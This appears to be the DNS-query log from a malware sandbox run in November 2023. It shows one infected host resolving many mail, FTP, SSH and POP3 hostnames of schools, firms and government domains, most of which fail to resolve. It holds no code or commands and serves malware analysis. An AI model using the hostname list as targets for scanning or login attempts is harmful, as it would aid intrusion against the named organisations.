                                                                                                                                                                                                    Nov 26, 2023 06:59:32.230015039 CET1.1.1.1192.168.2.40xfa51No error (0)mail.beachrecruitment.com95.168.220.222A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.259929895 CET1.1.1.1192.168.2.40xec28Name error (3)mailgate.bayambnag.gov.phnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.275088072 CET1.1.1.1192.168.2.40xb7a0No error (0)www.harasduberry.comweb.jimdo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.275088072 CET1.1.1.1192.168.2.40xb7a0No error (0)web.jimdo.comweb-hp.prod.jimdo.systemsCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.275088072 CET1.1.1.1192.168.2.40xb7a0No error (0)web-hp.prod.jimdo.systems34.240.130.5A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.275088072 CET1.1.1.1192.168.2.40xb7a0No error (0)web-hp.prod.jimdo.systems99.81.150.60A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.275088072 CET1.1.1.1192.168.2.40xb7a0No error (0)web-hp.prod.jimdo.systems34.251.197.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.284368038 CET1.1.1.1192.168.2.40x7cf8No error (0)www.gatewaytoearlylearning.comgatewaytoearlylearning.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.284368038 CET1.1.1.1192.168.2.40x7cf8No error (0)gatewaytoearlylearning.com199.34.228.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.311814070 CET1.1.1.1192.168.2.40xb6f7Name error (3)pop3.adm.uksw.edunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.313040972 CET1.1.1.1192.168.2.40x4799No error (0)ww38.ondania.com908910.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.313040972 CET1.1.1.1192.168.2.40x4799No error (0)908910.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.313040972 CET1.1.1.1192.168.2.40x4799No error (0)908910.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.316591024 CET1.1.1.1192.168.2.40x4edcNo error (0)kidsrkids.com141.193.213.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.316591024 CET1.1.1.1192.168.2.40x4edcNo error (0)kidsrkids.com141.193.213.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.321846008 CET1.1.1.1192.168.2.40x7893No error (0)www.perrisesd.orgca01901047.schoolwires.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.321846008 CET1.1.1.1192.168.2.40x7893No error (0)ca01901047.schoolwires.netd3i1ioguzwkpen.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.321846008 CET1.1.1.1192.168.2.40x7893No error (0)d3i1ioguzwkpen.cloudfront.net13.32.208.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.321846008 CET1.1.1.1192.168.2.40x7893No error (0)d3i1ioguzwkpen.cloudfront.net13.32.208.119A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.321846008 CET1.1.1.1192.168.2.40x7893No error (0)d3i1ioguzwkpen.cloudfront.net13.32.208.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.321846008 CET1.1.1.1192.168.2.40x7893No error (0)d3i1ioguzwkpen.cloudfront.net13.32.208.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.323548079 CET1.1.1.1192.168.2.40x8a3bName error (3)ftp.aoiit.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.362317085 CET1.1.1.1192.168.2.40x3a18Name error (3)pop3.elitebusinesshn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.374645948 CET1.1.1.1192.168.2.40xfcb5Name error (3)imap.gstudent.ctu.edu.vnnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.436878920 CET1.1.1.1192.168.2.40x5a9aServer failure (2)relay.schmith.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.463216066 CET1.1.1.1192.168.2.40x469dServer failure (2)smtp.schmith.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.502238989 CET1.1.1.1192.168.2.40x67b0No error (0)www.grg17geblergasse.at81.19.159.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.563357115 CET1.1.1.1192.168.2.40xe636No error (0)www.grantstech.iograntstech.ioCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.563357115 CET1.1.1.1192.168.2.40xe636No error (0)grantstech.io185.135.132.105A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.628750086 CET1.1.1.1192.168.2.40x2c66Name error (3)ftp.sofia-communications.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.630822897 CET1.1.1.1192.168.2.40xb50No error (0)www.avient.com23.185.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.739223957 CET1.1.1.1192.168.2.40x2093No error (0)www.maxiv.lu.seht-haproxy-dmz.maxiv.lu.seCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.739223957 CET1.1.1.1192.168.2.40x2093No error (0)ht-haproxy-dmz.maxiv.lu.se194.47.252.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.750927925 CET1.1.1.1192.168.2.40x216cName error (3)ftp.lwindowelive.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.774961948 CET1.1.1.1192.168.2.40xa7b8No error (0)www.beachrecruitment.combeachrecruitment.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.774961948 CET1.1.1.1192.168.2.40xa7b8No error (0)beachrecruitment.com95.168.220.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.896382093 CET1.1.1.1192.168.2.40xb1deName error (3)ftp.2l7g4s.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.936779976 CET1.1.1.1192.168.2.40xd899Name error (3)ftp.nohonetworks.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.939270973 CET1.1.1.1192.168.2.40xe3f8Server failure (2)mail.bosworthacademy.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.266848087 CET1.1.1.1192.168.2.40xa158Name error (3)lwindowelive.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.267818928 CET1.1.1.1192.168.2.40x5e75Name error (3)lgs-strategies.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.323009968 CET1.1.1.1192.168.2.40x5943Name error (3)ftp.carelesscommunity.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.333009005 CET1.1.1.1192.168.2.40x5167Name error (3)yahoo.comfreezednonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.387857914 CET1.1.1.1192.168.2.40xaf6Name error (3)ftp.yahoo.comfreezednonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.388257980 CET1.1.1.1192.168.2.40xa7f8Name error (3)ftp.lgs-strategies.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.396477938 CET1.1.1.1192.168.2.40x89dfName error (3)carelesscommunity.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.419476032 CET1.1.1.1192.168.2.40xb6fbName error (3)2l7g4s.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.420608044 CET1.1.1.1192.168.2.40x247bName error (3)sofia-communications.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.420941114 CET1.1.1.1192.168.2.40x80d8Name error (3)ftp.pixiil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.424410105 CET1.1.1.1192.168.2.40xd2cbName error (3)mail.sofia-communications.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.471120119 CET1.1.1.1192.168.2.40xd28bName error (3)ftp.ardcrushing.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.477356911 CET1.1.1.1192.168.2.40x506dName error (3)ftp.schor.benonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.489095926 CET1.1.1.1192.168.2.40x1f36Name error (3)ftp.xtsagency.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.492664099 CET1.1.1.1192.168.2.40xbe28Name error (3)ftp.macisis.co.uknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.516588926 CET1.1.1.1192.168.2.40x2b6Name error (3)ftp.dbschooldelhi.ac.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.523731947 CET1.1.1.1192.168.2.40xd3f9Name error (3)ftp.elitebusinesshn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.535923958 CET1.1.1.1192.168.2.40x17b1Name error (3)paintd.plus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.539386988 CET1.1.1.1192.168.2.40x91f7Name error (3)relay.bayambnag.gov.phnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.546664953 CET1.1.1.1192.168.2.40xefdName error (3)ftp.kvsroraipur.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.553879976 CET1.1.1.1192.168.2.40xff26Name error (3)ftp.y3.qj51acpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.572797060 CET1.1.1.1192.168.2.40xa493Name error (3)ftp.heathcotebarr.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.580991983 CET1.1.1.1192.168.2.40x9c3aName error (3)ftp.highstreet-re.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.581804037 CET1.1.1.1192.168.2.40x54bfName error (3)mail.yahoo.comfreezednonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.584402084 CET1.1.1.1192.168.2.40x438bName error (3)mail.2l7g4s.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.591017008 CET1.1.1.1192.168.2.40x1547Name error (3)ftp.paintd.plus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.602583885 CET1.1.1.1192.168.2.40x5015Name error (3)ftp.mnit.uc.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.609981060 CET1.1.1.1192.168.2.40x54a8Name error (3)mail.xtsagency.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.611406088 CET1.1.1.1192.168.2.40xc7c5No error (0)rech.com18.229.0.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.625993967 CET1.1.1.1192.168.2.40xaa38Name error (3)mail.paintd.plus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.632529020 CET1.1.1.1192.168.2.40x181fName error (3)mail.lgs-strategies.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.633924961 CET1.1.1.1192.168.2.40xce55Name error (3)ftp.xegge.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.636162043 CET1.1.1.1192.168.2.40x65a7Name error (3)mail.carelesscommunity.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.645663977 CET1.1.1.1192.168.2.40x13f5Name error (3)ftp.chandigarhuniversityazure.onmicrosoft.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.677217007 CET1.1.1.1192.168.2.40x9de5Name error (3)ftp.tnav.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.682606936 CET1.1.1.1192.168.2.40xb71cName error (3)ftp.firemailbox.clubnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.688677073 CET1.1.1.1192.168.2.40x1229Name error (3)ftp.member3.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.690068960 CET1.1.1.1192.168.2.40x7614Name error (3)pop3.member3.co.zanonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.813734055 CET1.1.1.1192.168.2.40x5905Name error (3)ftp.student.ub.ac.idnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.818877935 CET1.1.1.1192.168.2.40x3851Name error (3)mailgate.adm.uksw.edunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.847877979 CET1.1.1.1192.168.2.40x45e5No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.854026079 CET1.1.1.1192.168.2.40xbf1dNo error (0)www.knu.ac.in3.111.240.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.868540049 CET1.1.1.1192.168.2.40xfae3Name error (3)ftp.goldenfishcompany.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.874701023 CET1.1.1.1192.168.2.40xb538Name error (3)mail.y3.qj51acpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.877283096 CET1.1.1.1192.168.2.40xb88Name error (3)mail.ardcrushing.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.880032063 CET1.1.1.1192.168.2.40x8971Name error (3)mail.highstreet-re.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.880358934 CET1.1.1.1192.168.2.40xd4fdName error (3)mail.mnit.uc.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.880815029 CET1.1.1.1192.168.2.40x7357Name error (3)mail.dbschooldelhi.ac.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.919830084 CET1.1.1.1192.168.2.40x3d13Name error (3)ftp.healteas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.928281069 CET1.1.1.1192.168.2.40x73d6Name error (3)ftp.5.e9mbw4ghnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.933166027 CET1.1.1.1192.168.2.40xbb7fName error (3)mail.kvsroraipur.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.940817118 CET1.1.1.1192.168.2.40x1126Name error (3)mail.lwindowelive.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.941586018 CET1.1.1.1192.168.2.40xbc83Name error (3)ftp.matttux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.953247070 CET1.1.1.1192.168.2.40xc711Name error (3)ssh.lwindowelive.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.954617023 CET1.1.1.1192.168.2.40xab4dName error (3)ftp.foundtoo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.955636978 CET1.1.1.1192.168.2.40xc5aeName error (3)ftp.utlinks.omnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.959176064 CET1.1.1.1192.168.2.40xfea4Name error (3)mail.foundtoo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.962553978 CET1.1.1.1192.168.2.40xe563Name error (3)ssh.adm.uksw.edunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:33.964050055 CET1.1.1.1192.168.2.40x690aName error (3)ftp.ippals.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.017685890 CET1.1.1.1192.168.2.40x4d7eName error (3)mail.gmail.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.049798012 CET1.1.1.1192.168.2.40xf1baNo error (0)www.integraledu.hr78.128.62.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.082204103 CET1.1.1.1192.168.2.40xae9cName error (3)ftp.gstudent.ctu.edu.vnnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.104820013 CET1.1.1.1192.168.2.40xa861Server failure (2)ftp.bosworthacademy.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.111130953 CET1.1.1.1192.168.2.40x633Name error (3)ssh.lgs-strategies.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.154329062 CET1.1.1.1192.168.2.40xe495Name error (3)xtsagency.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.157552958 CET1.1.1.1192.168.2.40xec9aName error (3)mail.heathcotebarr.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.166563034 CET1.1.1.1192.168.2.40xc493Name error (3)ssh.gmail.iononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.209934950 CET1.1.1.1192.168.2.40x18caName error (3)ssh.sofia-communications.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.215488911 CET1.1.1.1192.168.2.40xa0e3Name error (3)ssh.aoiit.storenonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.262841940 CET1.1.1.1192.168.2.40xaa8Server failure (2)ftp.schmith.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.292433977 CET1.1.1.1192.168.2.40x56cbName error (3)ftp.bayambnag.gov.phnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.300226927 CET1.1.1.1192.168.2.40x6d4aNo error (0)route1.mx.cloudflare.net162.159.205.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.300226927 CET1.1.1.1192.168.2.40x6d4aNo error (0)route1.mx.cloudflare.net162.159.205.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.300226927 CET1.1.1.1192.168.2.40x6d4aNo error (0)route1.mx.cloudflare.net162.159.205.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.322720051 CET1.1.1.1192.168.2.40xf113Name error (3)ssh.paintd.plus.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.342150927 CET1.1.1.1192.168.2.40x2c1dName error (3)ssh.schor.benonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.369031906 CET1.1.1.1192.168.2.40xfea9No error (0)www.bunasta.eubunasta.euCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.369031906 CET1.1.1.1192.168.2.40xfea9No error (0)bunasta.eu92.62.143.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.395015001 CET1.1.1.1192.168.2.40xfec1Name error (3)bayambnag.gov.phnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.863476038 CET1.1.1.1192.168.2.40xd93fName error (3)ssh.yahoo.comfreezednonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.863739967 CET1.1.1.1192.168.2.40xa36dName error (3)ssh.matttux.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:34.865672112 CET1.1.1.1192.168.2.40x1a31Name error (3)ssh.ardcrushing.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.240689993 CET1.1.1.1192.168.2.40x5b66Name error (3)ssh.kvsroraipur.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.241352081 CET1.1.1.1192.168.2.40x9c3aName error (3)ssh.5.e9mbw4ghnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.250453949 CET1.1.1.1192.168.2.40xde2fServer failure (2)ssh.bosworthacademy.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.273114920 CET1.1.1.1192.168.2.40xfea4Name error (3)ssh.firemailbox.clubnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.302053928 CET1.1.1.1192.168.2.40xea49Name error (3)mailgate.elitebusinesshn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.453370094 CET1.1.1.1192.168.2.40x7e41Name error (3)ssh.goldenfishcompany.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.501996994 CET1.1.1.1192.168.2.40xa1b2Name error (3)ssh.2l7g4s.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.504081964 CET1.1.1.1192.168.2.40x29b4Name error (3)ssh.carelesscommunity.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.528096914 CET1.1.1.1192.168.2.40x9dbfName error (3)ssh.y3.qj51acpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.531435966 CET1.1.1.1192.168.2.40x9298Name error (3)y3.qj51acpnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.532562017 CET1.1.1.1192.168.2.40xfbcName error (3)ssh.highstreet-re.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.534461975 CET1.1.1.1192.168.2.40x35a0Name error (3)mnit.uc.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.534926891 CET1.1.1.1192.168.2.40x25aName error (3)ssh.mnit.uc.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.550760031 CET1.1.1.1192.168.2.40x38bcName error (3)ssh.xegge.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.552298069 CET1.1.1.1192.168.2.40x46ecName error (3)ssh.ibright.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.567069054 CET1.1.1.1192.168.2.40xb5a6Name error (3)ssh.pixiil.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.580930948 CET1.1.1.1192.168.2.40x4976Name error (3)ssh.chandigarhuniversityazure.onmicrosoft.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.594899893 CET1.1.1.1192.168.2.40x6e76Name error (3)kvsroraipur.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.600747108 CET1.1.1.1192.168.2.40x83a0Name error (3)ftp.lwindowelive.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.619664907 CET1.1.1.1192.168.2.40x7675Name error (3)ssh.nohonetworks.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.625725031 CET1.1.1.1192.168.2.40x44ceName error (3)ssh.dbschooldelhi.ac.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.626090050 CET1.1.1.1192.168.2.40x5023Name error (3)dbschooldelhi.ac.innonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.627026081 CET1.1.1.1192.168.2.40xeb25Name error (3)highstreet-re.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.627716064 CET1.1.1.1192.168.2.40x4d31Name error (3)ardcrushing.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.636531115 CET1.1.1.1192.168.2.40xde07Name error (3)ssh.heathcotebarr.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.648762941 CET1.1.1.1192.168.2.40x964bName error (3)ftp.cringemonster.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.649828911 CET1.1.1.1192.168.2.40x8fe9Name error (3)ssh.cringemonster.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.660305977 CET1.1.1.1192.168.2.40xef40Name error (3)ssh.elitebusinesshn.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.670789003 CET1.1.1.1192.168.2.40x4b97Name error (3)ms86978078.msv1.invalidnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.671272039 CET1.1.1.1192.168.2.40x26aeName error (3)ssh.foundtoo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.677130938 CET1.1.1.1192.168.2.40x6c3Name error (3)ssh.healteas.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.683619022 CET1.1.1.1192.168.2.40x14e2Name error (3)utlinks.omnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.691945076 CET1.1.1.1192.168.2.40x7215No error (0)www.rech.comstore-4.cws.digitalCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.691945076 CET1.1.1.1192.168.2.40x7215No error (0)store-4.cws.digital54.233.137.124A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.691945076 CET1.1.1.1192.168.2.40x7215No error (0)store-4.cws.digital54.233.178.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.693284035 CET1.1.1.1192.168.2.40x27d4Name error (3)smtp.heathcotebarr.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.693501949 CET1.1.1.1192.168.2.40xc840Name error (3)foundtoo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.730021000 CET1.1.1.1192.168.2.40x9762Name error (3)ssh.ippals.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.737862110 CET1.1.1.1192.168.2.40x1d11Name error (3)smtp.bunasta.eunonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.776743889 CET1.1.1.1192.168.2.40x8657Name error (3)ssh.macisis.co.uknonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                    Nov 26, 2023 06:59:37.785806894 CET1.1.1.1192.168.2.40x4e1bName error (3)ssh.tnav.runonenoneA (IP address)IN (0x0001)false
